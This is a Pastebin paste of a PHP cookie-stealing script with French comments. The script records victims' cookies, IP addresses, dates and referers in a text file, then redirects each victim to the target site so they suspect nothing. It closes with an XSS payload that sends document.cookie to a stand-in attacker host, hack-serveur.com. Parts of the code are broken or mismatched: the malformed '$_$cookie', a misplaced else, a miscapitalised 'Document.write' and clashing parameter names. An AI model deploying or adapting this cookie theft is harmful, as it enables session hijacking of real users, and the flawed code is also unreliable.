Advertisement
Cirphelion

Cookies Catcher Session

Jul 7th, 2015
234
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.76 KB | None | 0 0
  1. <?php
  2. /****** Exemple de fichier qui va récupéré les cookies et les transmettre via HTTP sous forme d'un fichier texte avec les informations nécéssaires ************
  3. ******* Il est clair sans exploiter une faille avant ou faire en sorte d'amener le client vers cette nouvelle connection n'aura aucune incidence majeure ******
  4. */
  5.  
  6.  
  7. $cookie  = $_GET['c'];  // on importe la variable GET et lui appose le nom ,c représente les données envoyées au script PHP dans une URL
  8. $ip = getenv ('REMOTE_ADDR'); // On récupére l'ip du client Tant qu'à faire
  9. $date=date('j F, Y, g:i a');  // La date du méfait lol
  10. $referer=getenv ('HTTP_REFERER'); //l'en tête de la connection client
  11. if(count($_$cookie) > 0)         // Le $_COOKIE représente des données disponibles pour un script PHP via des cookies HTTP. on vérifie qu'ils sont activés.
  12. {
  13. $fp  = fopen( 'cookies.txt' , 'a' ); // On ouvre cookies.txt en edition (il est créé si il n’existe pas)
  14.        fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date et Heure: ' .$date. '< br > Header: '.$referer.'< br > < br > < br >'); // On écrit le contenu du cookie.txt
  15.        fclose($fp); // On ferme le fichier cookies.txt
  16.        header ('Location: http://www.cible.com'); // on ramène l'utilisateur sur le site cible pour qu'il ne se doute de rien
  17.     else
  18.     {
  19.        $fp  = fopen( 'cookies.txt' , 'a' );
  20.        fwrite($fp,'Cookie #'.$cookie.'non trouver');
  21.        fclose($fp);
  22.        header ('Location: http://www.cible.com'); // on ramène l'utilisateur sur le site cible car on n'a pas eu de connection viable
  23.     }
  24. }
  25. ?>
  26.  
  27. // Pour ce qui est de l'injection elle sera du type :
  28.  
  29. <SCRIPT>
  30. Document.write('<img src=\'http://hack-serveur.com/volcookies.php?cookie=c'+escape(document.cookie)+'\' height=1 width=1>');
  31. </SCRIPT>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement